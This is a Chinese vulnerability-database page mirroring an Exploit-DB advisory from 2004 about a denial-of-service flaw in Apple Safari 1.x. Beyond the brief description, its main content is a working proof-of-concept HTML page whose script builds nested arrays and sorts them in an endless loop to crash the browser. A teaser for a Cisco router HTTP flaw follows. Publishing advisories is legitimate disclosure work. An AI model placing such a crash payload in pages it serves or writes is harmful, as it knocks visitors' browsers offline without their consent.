Apple Safari Web Browser 1.x – Infinite Array Sort Denial of Service

Apple Safari Web Browser 1.x – Infinite Array Sort Denial of Service

漏洞ID 1054771 漏洞类型
发布时间 2004-11-25 更新时间 2004-11-25
图片[1]-Apple Safari Web Browser 1.x – Infinite Array Sort Denial of Service-安全小百科CVE编号 N/A
图片[2]-Apple Safari Web Browser 1.x – Infinite Array Sort Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 OSX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24780
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11759/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed.

<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

相关推荐: Cisco路由器HTTP服务器漏洞

Cisco路由器HTTP服务器漏洞 漏洞ID 1207109 漏洞类型 未知 发布时间 1999-03-11 更新时间 1999-03-11 CVE编号 CVE-1999-0415 CNNVD-ID CNNVD-199903-034 漏洞平台 N/A CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享